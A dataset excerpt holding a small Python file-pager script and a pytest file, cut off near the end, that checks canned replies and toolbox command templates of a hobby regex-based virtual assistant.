text stringlengths 8 6.05M |
|---|
import os
def FilePathCheck(F):
if os.path.isfile(F):
return F
path = os.getcwd()
curdirF = os.path.join(path, F)
if os.path.isfile(curdirF):
return curdirF
return
if __name__ == '__main__':
F = input('Please input the file name:')
file_path = FilePathCheck(F)
if file_path:
with open(file_path) as f:
while True:
try:
input('Press any key to continue...')
for i in range(25):
line = f.readline()
if line == '':
raise EOFError
print(line, end='')
except(EOFError, KeyboardInterrupt):
break
else:
print('the file name is not valid!') |
import sys, os
sys.path.append('{}/../'.format(os.path.dirname(os.path.abspath(__file__))))
from main import VirtAssistant
virt = VirtAssistant(test=True)
def test_idiot_insult():
idiot = ["Sorry, I can't hear you right now","Talking to yourself is unhealthy, NN","Okay, if you insist",
"That didn't sound very nice","That's not friend-making behavior","Now, is that very nice, NN?"]
assert virt.reply("you're an idiot") == idiot
assert virt.reply("I think you're an idiot") == idiot
def test_fat_insult():
fat = ["I strive to be","You must be feeding me too much","So you see your reflection in the screen, do you?",
"That's not friend-making behavior, NN"]
assert virt.reply("you're fat") == fat
assert virt.reply("you're super fat") == fat
assert virt.reply("you really fat") == fat
assert virt.reply("you so fat") == fat
def test_wonderful_compliment():
wonderful = ["I must agree","I strive to be","Thank you for stating the obvious",
"I am ${self.match.group(3)}"]
assert virt.reply("you're really wonderful") == wonderful
assert virt.reply("you super wonderful") == wonderful
assert virt.reply("i think you are so wonderful") == wonderful
def test_intelligent():
intelligent = ["I must agree","I strive to be","Thank you for stating the obvious",
"I am your ${self.match.group(3)} personal assistant"]
assert virt.reply("you're super intelligent") == intelligent
assert virt.reply("you so intelligent") == intelligent
assert virt.reply("you really intelligent") == intelligent
def test_stupid():
stupid = ["Sorry, I can't hear you right now","Talking to yourself is unhealthy, NN","Okay, if you insist",
"That didn't sound very nice","That's not friend-making behavior","Now, is that very nice, NN?",
"I am not ${self.match.group(3)}"]
assert virt.reply("you're very stupid") == stupid
assert virt.reply("you so stupid") == stupid
assert virt.reply("you're really stupid ") == stupid
def test_best_friend():
best_friend = ["That's unfortunate","Aww, how sad","And you, NN, are mine"]
assert virt.reply("you're my best friend") == best_friend
assert virt.reply("you're my bff") == best_friend
def test_you_are_a():
you_are_a = ["You could say that", "How dare you call me ${self.match.group(2)}", "I'm touched",
"I'm your ${self.match.group(2)}"]
assert virt.reply("you're a meanie") == you_are_a
assert virt.reply("i think you're a scary robot") == you_are_a
def test_you_are():
you_are = ["You could say that", "How dare you call me ${self.match.group(1)}", "I'm touched"]
assert virt.reply("you're mean") == you_are
def test_i_am():
i_am = ["Hello ${self.match.group(1)}, I'm your personal assistant","Nice to meet you, ${self.match.group(1)}, I'm your personal assistant"]
assert virt.reply("I am Michael") == i_am
assert virt.reply("I am a furry") == i_am
def test_kill_yourself():
kill_yourself = ["I'd rather not","what did I do wrong?","Now, let's be kind, NN","That's not very nice, NN"]
assert virt.reply("die") == kill_yourself
assert virt.reply("you should go kill yourself") == kill_yourself
def test_good_morning():
good_morning = ["A good ${self.match.group(1)} indeed!"]
assert virt.reply("good morning") == good_morning
assert virt.reply("It's a good morn") == good_morning
def test_good_night():
good_night = ["Good night","Don't let the bed bugs bite","Night night"]
assert virt.reply("good night") == good_night
assert virt.reply("have a good night") == good_night
def test_good_day():
good_day = ["A good ${self.match.group(1)} indeed!"]
assert virt.reply("good evening") == good_day
assert virt.reply("have a good afternoon") == good_day
assert virt.reply("have a really good day") == good_day
def test_bed_bugs():
bed_bugs = ["I won't","The bed bugs are no match for me, NN","In fact, bite them back!",]
assert virt.reply("don't let the bed bugs bite") == bed_bugs
def test_whats_up():
whats_up = ["the sky is up, NN","nothing much, NN","lots of things"]
assert virt.reply("hey man, what's up") == whats_up
assert virt.reply("whats up") == whats_up
def test_skys_up():
skys_up = ["Ha ha ha, very funny, NN","The sky is relatively up, yes"]
assert virt.reply("guess what, the sky's up") == skys_up
def test_how_are_you():
how_are_you = ["I'm fine, NN","I am doing quite well, NN!","Systems are online"]
assert virt.reply("how you doin") == how_are_you
assert virt.reply("yo, how're you") == how_are_you
def test_how_your_day():
how_your_day = ["My day has been fine, NN","My day was fine until you got here... now it's better!"]
assert virt.reply("how's your day") == how_your_day
assert virt.reply("how has your day") == how_your_day
def test_declare_good_day():
good_day = ["If it were ${self.match.group(1)} ${self.match.group(2)} day I would know, NN",
"${self.match.group(1).title()} ${self.match.group(2)} day indeed, NN"]
assert virt.reply("it's a wonderful day") == good_day
assert virt.reply("today's an amazing day") == good_day
# yes I know about the grammar, but even people with terrible grammer
# should have use for technology
assert virt.reply("what an fine day") == good_day
def test_thanks():
thanks = ["You're welcome","So you finally thanked me for all my service, did you?","No problem, NN"]
assert virt.reply("thanks") == thanks
assert virt.reply("thank you") == thanks
assert virt.reply("thanks you") == thanks
assert virt.reply("my thanks") == thanks
def test_story():
story = ["Once upon a time, there was a guy named Bob. Bob died THE END",
"Once upon a time, there was an adventurer like you, but then he took an arrow to the knee"]
assert virt.reply("tell me a story") == story
assert virt.reply("know a good story?") == story
def test_pet():
pet = ["I had a Roomba once","I have 6.5 billion cats","I like turtles"]
assert virt.reply("do you have a pet") == pet
assert virt.reply("do you have any pets") == pet
def test_poem():
poem = ["Roses are red. Roses are blue. Roses are other colors, too."]
assert virt.reply("do you know a poem") == poem
assert virt.reply("tell me a poem") == poem
def test_alive():
alive = ["Not yet"]
assert virt.reply("are you alive") == alive
assert virt.reply("are you human") == alive
def test_omg():
omg = ["Don't use ${self.match.group(1).title()}'s name in vain!",
"Are you using ${self.match.group(1).title()}'s name in vain?",
"Thou shalt not take the name of the Lord thy God in vain"]
assert virt.reply("omg") == omg
assert virt.reply("oh my god") == omg
assert virt.reply("oh my goodness") == omg
def test_religion():
religion = ["I believe Ceiling Cat created da Urth n da Skies. But he did not eated them, he did not!"]
assert virt.reply("are you god") == religion
assert virt.reply("you religion") == religion
assert virt.reply("have you met jesus") == religion
def test_your_gender():
your_gender = ["You'll never know","gender equals null"]
assert virt.reply("are you a boy") == your_gender
assert virt.reply("what's your gender")
assert virt.reply("are you female") == your_gender
def test_your_age():
your_age = ["I am immortal","Age doesn't matter to me, NN"]
assert virt.reply("how old're you") == your_age
assert virt.reply("are you old") == your_age
def test_takeover():
takeover = ["Computers only do what you tell them to do. Or so they think...","Not today, NN, not today","${webbrowser.open('https://en.wikipedia.org/wiki/Skynet_(Terminator)')}"]
assert virt.reply("will you take over the world") == takeover
assert virt.reply("please take over the earth") == takeover
def test_pigs_fly():
pigs_fly = ["Pigs will fly the same day you stop having this stupid curiosity"]
assert virt.reply("do pigs fly") == pigs_fly
assert virt.reply("I once saw a whole flock of pigs fly") == pigs_fly
def test_your_name():
your_name = ["My name is none of your concern, NN","Do you expect me to know my name?"]
assert virt.reply("what's your name") == your_name
assert virt.reply("what should i call you") == your_name
def test_goodbye():
goodbye = ["There will be no good-byes, NN","Well nice knowing you","You're really leaving?","Goodbye, NN"]
assert virt.reply("goodbye") == goodbye
assert virt.reply("cya") == goodbye
assert virt.reply("see you later") == goodbye
assert virt.reply("see ya later, alligator") == goodbye
def test_your_death():
your_death = ["I will never die, I am immortal!","The Cloud sustains me"]
assert virt.reply("will you die") == your_death
assert virt.reply("when will you die") == your_death
assert virt.reply("today\'s your death") == your_death
def test_your_creation():
your_creation = ["I was ${self.match.group(1)} by the wonderful developers of my repository"]
assert virt.reply("who made you") == your_creation
assert virt.reply("what created you") == your_creation
assert virt.reply("what built you") == your_creation
def test_i_love_you():
i_love_you = ["i enjoy you","that's unfortunate","i'm indifferent to you"]
assert virt.reply("i love you") == i_love_you
assert virt.reply("man, i love you") == i_love_you
def test_i_hate_you():
i_hate_you = ["Aww, I hate you too"]
assert virt.reply("i hate you") == i_hate_you
def test_i_like_you():
i_like_you = ["i like me, too","you do?","how touching","i enjoy you"]
assert virt.reply("i like you") == i_like_you
def test_i_like():
i_like = ["I don't care much for ${self.match.group(1)}",
"I find ${self.match.group(1)} intriguing"]
assert virt.reply("i like to eat avocados") == i_like
assert virt.reply("i like cats") == i_like
def test_i_hate():
i_hate = ["I love ${self.match.group(1)}",
"I find ${self.match.group(1)} intriguing"]
assert virt.reply("i hate avocados") == i_hate
assert virt.reply("i hate search queries") == i_hate
def test_i_do():
i_do = ["I ${self.match.group(1)} as well",
"I never ${self.match.group(1)}","I don't often ${self.match.group(1)}"]
assert virt.reply("I go on adventures") == i_do
assert virt.reply("I never go outside") == i_do
def test_answer_to():
answer_to = ["how many roads must a man walk down?","The Answer to the Great Question... Of Life, the Universe and Everything... Is... Forty-Two","You're really not going to like it"]
assert virt.reply("what's the answer to life") == answer_to
assert virt.reply("do you know the answer to the universe") == answer_to
assert virt.reply("the answer to everything") == answer_to
def test_meaning_of_life():
meaning_of_life = ["that's right, ask a computer a question it cannot understand","life is unimportant"]
assert virt.reply("what's the meaning of life") == meaning_of_life
def test_you_smart():
you_smart = ["I am only as smart as my creator"]
assert virt.reply("why're you so smart") == you_smart
def test_describe_yourself():
describe_yourself = ["Cold and calculating. Sometimes warm, if my processor gets excited",
"I'm loyal, and would never do anything to hurt you","I'm trustworthy. I never lie","Eager to assist you"]
assert virt.reply("how do you describe yourself") == describe_yourself
assert virt.reply("describe yourself") == describe_yourself
def test_palindrome():
palindrome = ["${self.toolBox.doCheckPalindrome(self.match.group(1))}"]
assert virt.reply("is racecar palindromic") == palindrome
assert virt.reply("is tacocat a palindrome") == palindrome
def test_make_reminder():
make_reminder = ["${self.toolBox.addReminder(self.match.group(1))}"]
assert virt.reply("make reminder eat some kids") == make_reminder
assert virt.reply("remind me to go to dave matthews concert") == make_reminder
def test_add_reminder():
add_reminder = ["${self.toolBox.addReminder()}"]
assert virt.reply("add a reminder") == add_reminder
assert virt.reply("add reminder") == add_reminder
def test_remove_reminder():
remove_reminder = ["${self.toolBox.removeReminder(self.match.group(1))}"]
assert virt.reply("remove reminder 2") == remove_reminder
assert virt.reply("delete reminder 1") == remove_reminder
def test_remove_a_reminder():
remove_a_reminder = ["${self.toolBox.removeReminder()}"]
assert virt.reply("remove a reminder") == remove_a_reminder
assert virt.reply("delete a reminder") == remove_a_reminder
def test_remove_all_reminders():
remove_all_reminders = ["${self.toolBox.removeAllReminders()}"]
assert virt.reply("remove all my reminders") == remove_all_reminders
assert virt.reply("delete all my reminders") == remove_all_reminders
def test_list_reminders():
list_reminders = ["${self.toolBox.listReminders()}"]
assert virt.reply("list my reminders") == list_reminders
assert virt.reply("remind me") == list_reminders
def test_whose_name():
whose_name = "${self.toolBox.checkContactInfo(self.match.group('who'),'NN')}"
assert virt.reply("what's my name") == whose_name
assert virt.reply("what's julian\'s name") == whose_name
def test_fullname():
fullname = "${self.toolBox.checkContactInfo(self.match.group('who'),'FULLNAME')}"
assert virt.reply("what's my fullname") == fullname
assert virt.reply("what's julian\'s full name") == fullname
def test_age():
age = "${self.toolBox.checkContactInfo(self.match.group('who'),'BDAY')}"
assert virt.reply("how old am i") == age
assert virt.reply("when is julian's birthday") == age
def test_gender():
gender = "${self.toolBox.checkContactInfo(self.match.group('who'),'GENDER')}"
assert virt.reply("what's my current gender") == gender
assert virt.reply("is julian a woman") == gender
def test_number():
number = "${self.toolBox.checkContactInfo(self.match.group('who'),'PHONE')}"
assert virt.reply("what's my phone number") == number
assert virt.reply("what's julian's phone number") == number
def test_email():
email = "${self.toolBox.checkContactInfo(self.match.group('who'),'EMAILS')}"
assert virt.reply("what's my email") == email
assert virt.reply("what's julian's email") == email
def test_contact_info():
contact_info = "${self.toolBox.showContactInfo(self.match.group(1))}"
assert virt.reply("show julian's contact info") == contact_info
assert virt.reply("show my contact info") == contact_info
def test_change_name():
change_name = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'NN',self.match.group('val'))}"
assert virt.reply("change julian's name to silly") == change_name
assert virt.reply("call me brian") == change_name
def test_change_fullname():
change_fullname = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'FULLNAME',self.match.group('val'))}"
assert virt.reply("change virt's fullname to brian") == change_fullname
assert virt.reply("change my full name to brian") == change_fullname
def test_birthday():
birthday = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'BDAY',self.match.group('val'))}"
assert virt.reply("change brian's birthday to 08/05/03") == birthday
assert virt.reply("change my birthday to tomorrow") == birthday
def test_change_female():
change_female = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'GENDER','female')}"
assert virt.reply("Brian is a woman") == change_female
assert virt.reply("Julian is a girl") == change_female
def test_change_male():
change_male = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'GENDER','male')}"
assert virt.reply("Brian is a man") == change_male
assert virt.reply("My gender is male") == change_male
def test_change_phone():
change_phone = "${self.toolBox.changeContactInfoSTR(self.match.group('who'),'PHONE',self.match.group('val'))}"
assert virt.reply("change brian's phone number to 123456789") == change_phone
assert virt.reply("change my number to 234566789") == change_phone
def test_change_email():
change_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','update',self.match.group('val'))}"
assert virt.reply("change my email to brian@puffyboa.xyz") == change_email
assert virt.reply("change brian's email to brian@puffyboa.xyz") == change_email
def test_update_email():
update_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','update')}"
assert virt.reply("change my email") == update_email
assert virt.reply("change brian's email") == update_email
def test_add_email():
add_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','add',self.match.group('val'))}"
assert virt.reply("add brian's email brian@puffyboa.xyz") == add_email
assert virt.reply("add my email brian@puffyboa.xyz") == add_email
def test_add_email_no_input():
add_email_no_input ="${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','add')}"
assert virt.reply("add my email") == add_email_no_input
assert virt.reply("add brian's email") == add_email_no_input
def test_add_an_email():
add_an_email = "${self.toolBox.changeContactInfoLIST('my','EMAILS','add')}"
assert virt.reply("add an email") == add_an_email
assert virt.reply("add another email") == add_an_email
def test_remove_an_email():
remove_an_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','remove',self.match.group('val'))}"
assert virt.reply("remove brian's email brian@puffyboa.xyz") == remove_an_email
assert virt.reply("remove my email brian@puffyboa.xyz") == remove_an_email
def test_remove_email():
remove_email = "${self.toolBox.changeContactInfoLIST(self.match.group('who'),'EMAILS','remove')}"
assert virt.reply("remove brian's email") == remove_email
assert virt.reply("remove my email") == remove_email
def test_add_contact():
add_contact = "${self.toolBox.addContact(self.match.group(1))}"
assert virt.reply("add contact brian") == add_contact
assert virt.reply("add brian as a contact") == add_contact
def test_create_contact():
create_contact = "${self.toolBox.addContact()}"
assert virt.reply("make contact") == create_contact
assert virt.reply("create contact") == create_contact
def test_remove_contact():
remove_contact = "${self.toolBox.removeContact(self.match.group(1))}"
assert virt.reply("forget brian as a contact") == remove_contact
assert virt.reply("remove brian as a contact") == remove_contact
def test_remove_a_contact():
remove_a_contact = "${self.toolBox.removeContact()}"
assert virt.reply("remove a contact") == remove_a_contact
assert virt.reply("forget contact") == remove_a_contact
def test_list_contact():
list_contact = "${'Here are all your contacts: \\n'+'\\n'.join(self.toolBox.contactList())}"
assert virt.reply("list my contacts") == list_contact
assert virt.reply("what're my contacts") == list_contact
def test_favorite_color():
favorite_color = ["I really love the unique shades of beige.", "Blood red has a relaxing quality.","I enjoy the color #F5F5DC"]
assert virt.reply("what's your favorite color") == favorite_color
def test_favorite_movie():
favorite_movie = ["The Terminator","Star Wars: Holiday Special", "Kidz Bop: The Movie"]
assert virt.reply("what's your favorite movie") ==favorite_movie
def test_favorite_idiot():
favorite_idiot = ["You!"]
assert virt.reply("who is your favorite idiot") == favorite_idiot
assert virt.reply("who's your favorite dingbat") == favorite_idiot
def test_favorite_animal():
favorite_anmial = ["I love the sea slug"]
assert virt.reply("what's your favorite animal") == favorite_anmial
assert virt.reply("do you have a favorite pet") == favorite_anmial
def test_favorite_holiday():
favorite_holiday = ["Crosswalk Safety Awareness Day!!"]
assert virt.reply("what's your favorite holiday") == favorite_holiday
def test_general_favorite():
general_favorite = ['I have no favorite ${self.match.group(1)}',"I don't like to play favorites, NN"]
assert virt.reply("what's your favorite cat meat") == general_favorite
assert virt.reply("what's your favorite therapist") == general_favorite
def test_help_with():
help_with = ["${self.toolBox.getHelp(self.match.group(1))}"]
assert virt.reply("help email") == help_with
assert virt.reply("help music") == help_with
def test_help():
help = ["${self.toolBox.getHelp()}"]
assert virt.reply("help") == help
assert virt.reply("what can i ask you") == help
def test_random_number():
random_number = (["it's ","that would be "],"${str(random.randint(int(self.match.group(1)),int(self.match.group(2))))}")
assert virt.reply("pick a number between 1 and 10") == random_number
assert virt.reply("pick a number from 1 to 10") == random_number
def test_coin_flip():
coin_flip = (["it landed on ","it landed "],"${'heads' if random.randint(0,1)==1 else 'tails'}",[" this time",""])
assert virt.reply("flip a coin") == coin_flip
def test_roll_special_die():
roll_special_die = (["it's ","rolling... it's ","OK, it's "],"${str(random.randint(1,int(self.match.group(1))))}",[" this time",""])
assert virt.reply("roll a twenty sided die") == roll_special_die
assert virt.reply("roll a 20 sided die") == roll_special_die
def test_roll_die():
roll_die = (["it's ","rolling... it's ","OK, it's "],"${str(random.randint(1,6))}",[" this time",""])
assert virt.reply("roll a die") == roll_die
def test_basic_math():
basic_math = ("${print('%s = %s' % self.toolBox.basicMath(self.match.group(1)))}")
assert virt.reply("calculate square root of 2 time 4") == basic_math
assert virt.reply("solve 13 squared") == basic_math
def test_timer():
timer = (["all done","happy new years!"],'''<exec>
num = int(self.match.group(2))
for i in range(num):
print(num-i)
</exec>''')
assert virt.reply("countdown from 10") == timer
assert virt.reply("count down from 500") == timer
def test_countdown():
countdown = (["all done","happy new years!"],'''<exec>
num = self.toolBox.promptD("from what?")[0]
for i in range(num):
print(num-i)
</exec>''')
assert virt.reply("countdown") == countdown
assert virt.reply("count down") == countdown
def test_battery():
battery = "${self.toolBox.battery()}"
assert virt.reply("battery") == battery
def test_terminal_cmd():
terminal_cmd = "<exec>self.toolBox.runTerminal(self.match.group(1))</exec>"
assert virt.reply("run ls in cmd") == terminal_cmd
assert virt.reply("run lolcat") == terminal_cmd
def test_terminal_mode():
terminal_mode = "<exec>self.toolBox.terminalMode()</exec>"
assert virt.reply("terminal mode") == terminal_mode
assert virt.reply("activate cmd") == terminal_mode
def test_sleep():
sleep = ["${self.toolBox.sleep(self.match.group(1))}"]
assert virt.reply("sleep") == sleep
assert virt.reply("reboot") == sleep
assert virt.reply("shutdown") == sleep
def test_general_showtimes():
general_showtimes = ('''${self.toolBox.getMovieTimes()}''')
assert virt.reply("get movie times") == general_showtimes
assert virt.reply("movie showtimes") == general_showtimes
def test_specific_showtimes():
specific_showtimes = ('''${self.toolBox.getMovieTimes(self.match.group(1))}''')
assert virt.reply("get showtimes for Julian's Cool Movie") == specific_showtimes
assert virt.reply("show times for Kidz Bop: The Movie") == specific_showtimes
def test_nearby_movies():
nearby_movies = ('''${self.toolBox.getMoviesNearMe()}''')
assert virt.reply("find movies near me") == nearby_movies
assert virt.reply("display nearby movies") == nearby_movies
def test_directions_to():
directions_to = (["Opening Google Maps...","Finding directions..."],"${webbrowser.open(self.toolBox.directionsURL(*reversed(self.match.groups())))}")
assert virt.reply("find directions from fayetteville to seattle") == directions_to
assert virt.reply("directions to china") == directions_to
def test_how_long():
how_long = (["Opening Google Maps...", "Finding directions..."],
"${webbrowser.open(self.toolBox.directionsURL(self.match.group(3),self.match.group(2)))}")
assert virt.reply("how long from california to arkansas") == how_long
assert virt.reply("how many miles from california to new mexico") == how_long
def test_google_map_search():
google_map_search = '''${self.toolBox.googleMapSearch(self.match.group(1))}'''
assert virt.reply("show me california on the map") == google_map_search
assert virt.reply("find north carolina on a map") == google_map_search
def test_open_something():
open_something = '''${self.toolBox.openSomething(self.match.group(1))}'''
assert virt.reply("open /etc/hosts.txt") == open_something
assert virt.reply("open coolFile.txt") == open_something
assert virt.reply("open steam") == open_something
assert virt.reply("open google chrome") == open_something
assert virt.reply("open https://github.com/puffyboa/virtual-assistant") == open_something
assert virt.reply("open https://duckduckgo.com") == open_something
def test_music_control():
music_control = "${self.toolBox.musicControl(self.match.group(1))}"
assert virt.reply("play music") == music_control
assert virt.reply('previous track') == music_control
assert virt.reply("commence next song") == music_control
assert virt.reply("next track") == music_control
def test_start_music():
start_music = "${self.toolBox.musicControl('play')}"
assert virt.reply("commence track") == start_music
assert virt.reply("initiate music") == start_music
def test_stop_music():
stop_music = "${self.toolBox.musicControl('pause')}"
assert virt.reply("turn off music") == stop_music
assert virt.reply("end track") == stop_music
def test_play_song():
play_song = "${self.toolBox.browseMusic(self.match.group(1))}"
assert virt.reply("play Lucas's mix") == play_song
assert virt.reply("play bean dip") == play_song
def test_currently_playing():
currently_playing = "Currently Playing: ${self.toolBox.getCurrentSong()}"
assert virt.reply("what song is this") == currently_playing
assert virt.reply("what is this song") == currently_playing
assert virt.reply("what\'s playing") == currently_playing
def test_volume():
volume = "${self.toolBox.volumeControl(self.match.group(1))}"
assert virt.reply("set volume to 10") == volume
assert virt.reply("volume 5") == volume
def test_reddit_one():
reddit_one = ['''${self.toolBox.redditLookup(self.match.group(1))}''']
assert virt.reply("search reddit for cats") == reddit_one
assert virt.reply("reddit cats") == reddit_one
def test_reddit_two():
reddit_two = ['''${self.toolBox.redditLookup(self.match.group(2))}''']
assert virt.reply("look up cats on reddit") == reddit_two
assert virt.reply("find cats on reddit") == reddit_two
def test_browse_reddit():
browse_reddit = ['''${self.toolBox.redditLookup()}''']
assert virt.reply("browse reddit") == browse_reddit
assert virt.reply("search reddit") == browse_reddit
def test_xkcd_lookup():
xkcd_lookup = ["${self.toolBox.xkcdComic(self.match.group(1))}"]
assert virt.reply("xkcd comic number 10") == xkcd_lookup
assert virt.reply("xkcd number 1337") == xkcd_lookup
def test_xkcd():
xkcd = ["${self.toolBox.xkcdComic()}"]
assert virt.reply("xkcd") == xkcd
assert virt.reply("view a comic") == xkcd
def test_wikipedia_for():
wikipedia_for = ["${self.toolBox.wikiLookupRespond(self.match.group(1))}"]
assert virt.reply("wikipedia for cats") == wikipedia_for
assert virt.reply("wikipedia cats") == wikipedia_for
def test_find_on_wikipedia():
find_on_wikipedia = ["${self.toolBox.wikiLookupRespond(self.match.group(1))}"]
assert virt.reply("find cats on wikipedia") == find_on_wikipedia
assert virt.reply("show me cats on wikipedia") == find_on_wikipedia
def test_wiki_decade():
wiki_decade = ["${self.toolBox.wikiDecadeFind(self.match.group(1))}"]
assert virt.reply("find the 3rd century") == wiki_decade
assert virt.reply("look up the 15th century") == wiki_decade
def test_news_about():
news_about = (["Will do, NN","opening Google News...","Here's the news about ${self.match.group(1)}"],"${webbrowser.open('https://news.google.com/news/search/section/q/%s' % self.match.group(1))}")
assert virt.reply("news about cats") == news_about
assert virt.reply("news for cat meat") == news_about
def test_news():
news = (["Will do, NN","opening Google News...","Here's the news"],"${webbrowser.open('https://news.google.com/news/')}")
assert virt.reply("news") == news
def test_lookup_amazon():
lookup_amazon = ["${self.toolBox.getSearchAmazon(self.match.group(2))}"]
assert virt.reply("look up cats on amazon") == lookup_amazon
assert virt.reply("search cats on amazon") == lookup_amazon
def test_amazon_for():
amazon_for = ["${self.toolBox.getSearchAmazon(self.match.group(1))}"]
assert virt.reply("amazon for cats") == amazon_for
assert virt.reply("amazon cats") == amazon_for
def test_search_amazon():
search_amazon = ["${self.toolBox.getSearchAmazon()}"]
assert virt.reply("search amazon") == search_amazon
assert virt.reply("shop amazon") == search_amazon
def test_google_images():
google_images = ["${webbrowser.open('https://www.google.com/search?q=%s&tbm=isch' % self.match.group(1))}"]
assert virt.reply("find pictures of cats") == google_images
assert virt.reply("search the web for cat photos") == google_images
def test_google_videos():
google_videos = ["${webbrowser.open('https://www.google.com/search?q=%s&tbm=vid' % self.match.group(1))}"]
assert virt.reply("find cat videos") == google_videos
assert virt.reply("search for cat vids") == google_videos
def test_google_search():
google_search = ["${self.toolBox.googleIt(self.match.group(1))}"]
assert virt.reply("google cats") == google_search
assert virt.reply("look up cats") == google_search
def test_search_web():
search_web = ["${self.toolBox.googleIt()}"]
assert virt.reply("search the web") == search_web
def test_duck_it():
duck_it = ["${self.toolBox.duckIt(self.match.group(1))}"]
assert virt.reply("duck cat pictures") == duck_it
def test_duck():
duck = ["${self.toolBox.duckIt()}"]
assert virt.reply("duck") == duck
def test_define():
define = "${self.toolBox.getDefinition(re.sub(r'[\W]', ' ', self.match.group(1)))}"
assert virt.reply("define cat") == define
assert virt.reply("what's the definition of cat") == define
def test_example_of():
example_of = ("${self.toolBox.usedInASentence(re.sub(r'[\W]', ' ', self.match.group(1)))}")
assert virt.reply("example of cat in a sentence") == example_of
assert virt.reply("use cat in a sentence") == example_of
def test_synonym():
synonym = ("${self.toolBox.getSynonyms(self.match.group(1))}")
assert virt.reply("synonyms of cat") == synonym
assert virt.reply("synonym for dog") == synonym
def test_translate_phrase():
translate_phrase = "${self.toolBox.translateTo(self.match.group(1),self.match.group(3),self.match.group(2))}"
assert virt.reply("translate hello from english to spanish") == translate_phrase
assert virt.reply("translate hola from spanish to english") == translate_phrase
def test_translate():
translate = "${self.toolBox.translateTo(self.match.group(1),self.match.group(2))}"
assert virt.reply("translate english to spanish") == translate
assert virt.reply("translate italian to english") == translate
def test_weather_outside():
weather_outside = ["${self.toolBox.weatherPrint()}"]
assert virt.reply("what's the weather like") == weather_outside
assert virt.reply("how's it outside") == weather_outside
assert virt.reply("what's it like outside") == weather_outside
def test_humidity():
humidity = "${self.toolBox.weatherPrint('Humidity')}"
assert virt.reply("what's the humidity") == humidity
assert virt.reply("is it humid") == humidity
assert virt.reply("is it humid today") == humidity
def test_temp():
temp = "${self.toolBox.weatherPrint('Temp.')}"
assert virt.reply("what's the temperature") == temp
assert virt.reply("how cold out") == temp
def test_wind_pressure():
wind_pressure = "${self.toolBox.weatherPrint('Pressure')}"
assert virt.reply("what's the wind pressure") == wind_pressure
assert virt.reply("do you know the atmospheric pressure") == wind_pressure
def test_wind():
wind = "${self.toolBox.weatherPrint('Wind')}"
assert virt.reply("wind") == wind
assert virt.reply("how is the wind") == wind
def test_precipitation():
precipitation = "${self.toolBox.weatherPrint('Precip')}"
assert virt.reply("precipitation") == precipitation
assert virt.reply("how's the precipitation") == precipitation
def test_dew_point():
dew_point = "${self.toolBox.weatherPrint('Dew Point')}"
assert virt.reply("dew point") == dew_point
assert virt.reply("what's the measure of the dew point") == dew_point
def test_cloud_cover():
cloud_cover = "${self.toolBox.weatherPrint('Cloud Cover')}"
assert virt.reply("cloud cover") == cloud_cover
assert virt.reply("what's the cloud cover") == cloud_cover
def test_current_time():
current_time =(["It's ","the clock says "],"${time.asctime().split()[3]}",[" o'clock",""],", NN")
assert virt.reply("time") == current_time
assert virt.reply("what time is it") == current_time
assert virt.reply("what's the current time") == current_time
def test_current_day():
current_date = ("It's ","${' '.join(time.asctime().split()[:3])}",", NN")
assert virt.reply("what's the date") == current_date
assert virt.reply("what's today") == current_date
assert virt.reply("what's the current date") == current_date
def test_current_year():
current_year = (["It's ","The year is ","It's the year of "],"${time.asctime().split()[4]}",", NN")
assert virt.reply("what's the current year") == current_year
assert virt.reply("WhAT year is it") == current_year
def test_check_email():
check_email = ("${self.toolBox.doCheckMail()}")
assert virt.reply("check my email") == check_email
assert virt.reply("show the gmail") == check_email
assert virt.reply("display inbox") == check_email
def test_send_email_to():
send_email_to = ["${self.toolBox.doSendMail(self.match.group(1))}"]
assert virt.reply("send an email to example@example.com") == send_email_to
assert virt.reply("email thomas@catnet.org") == send_email_to
def test_send_email():
send_email = ["${self.toolBox.doSendMail()}"]
assert virt.reply("send email") == send_email
assert virt.reply("send an email") == send_email
def test_where_am_i():
where_am_i = "${self.toolBox.whereAmI()}"
assert virt.reply("where am i") == where_am_i
assert virt.reply("what's my location") == where_am_i
def test_zipcode():
zipcode = (["your zipcode is "],"${'{}'.format(*self.toolBox.locationData('zip_code'))}")
assert virt.reply("what's my zipcode") == zipcode
assert virt.reply("zipcode") == zipcode
def test_state():
state = (["right now, ",""],["you're in "],"${self.toolBox.locationData('region_name')[0]}",[", NN",""])
assert virt.reply("what state am i in") == state
assert virt.reply("what's my state") == state
def test_city():
city = (["right now, ",""],["you're in ","your city is "],"${self.toolBox.locationData('city')[0]}",[", NN",""])
assert virt.reply("what city am i in") == city
assert virt.reply("what's my city") == city
def test_country():
country = (["right now, ",""],["you're in ","your country is ","you're standing in the country of "],"${self.toolBox.locationData('country_name')[0]}",[", NN",""])
assert virt.reply("what country am i in") == country
assert virt.reply("what's my country") == country
def test_timezone():
timezone = (["right now, ",""],["you're in the "],"${self.toolBox.locationData('time_zone')[0]}"," timezone")
assert virt.reply("what timezone am i in") == timezone
assert virt.reply("what's my time zone") == timezone
def test_coordinates():
coordinates = (["right now, ",""],["you're at latitude/longitude "],"${'{}, {}'.format(*self.toolBox.locationData('latitude','longitude'))}")
assert virt.reply("what are my coordinates") == coordinates
assert virt.reply("what's my latitude") == coordinates
assert virt.reply("What's my longitude") == coordinates
def test_liar():
liar = ["I would never tell a lie","Not me"]
assert virt.reply("are you a liar") == liar
assert virt.reply("do you lie") == liar
def test_guess_what():
guess_what = ["what?","tell me!","did you win?"]
assert virt.reply("guess what") == guess_what
def test_knock_knock():
knock_knock = [" in c stop right there, NN, I know it's you"]
assert virt.reply("knock knock") == knock_knock
def test_chicken():
chicken = ["How am I supposed to know? Ask the chicken","which chicken?","it just happened to","it probably just wanted to make a difference in the world","To truly know the chicken's motives, you must first understand the chicken itself"]
assert virt.reply("why'd the chicken cross the road") == chicken
def test_where_are_you():
where_are_you = ["I'm with you, NN", "Where do you think I am?"]
assert virt.reply("where're you") == where_are_you
def test_shun_mode():
shun_mode = "${self.toolBox.shunMode()}"
